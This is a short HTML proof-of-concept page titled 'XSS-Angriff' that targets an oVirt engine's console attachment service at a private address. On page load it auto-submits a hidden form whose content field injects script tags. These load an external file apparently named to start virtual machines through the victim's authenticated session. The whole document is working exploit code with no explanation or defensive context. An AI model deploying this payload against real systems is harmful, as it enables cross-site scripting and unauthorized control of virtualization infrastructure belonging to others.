<html><head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>XSS-Angriff</title></head>
<body onload="document.forms[0].submit()">
<form method="post" action="https://192.168.2.185/ovirt-engine/services/attachment/console.vv">
<input type="hidden" name="contenttype" value="text/html; charset=utf-8" />
<input type="hidden" name="content" value="<body><script src=&#x22;https://localhost/js/BigInteger.min.js&#x22;></script><script src=&#x22;https://localhost/js/ovirtXSSExploitVmStarten.js&#x22;></script></body>" />
<input type="hidden" name="encodingtype" value="plain" />
</form></body></html>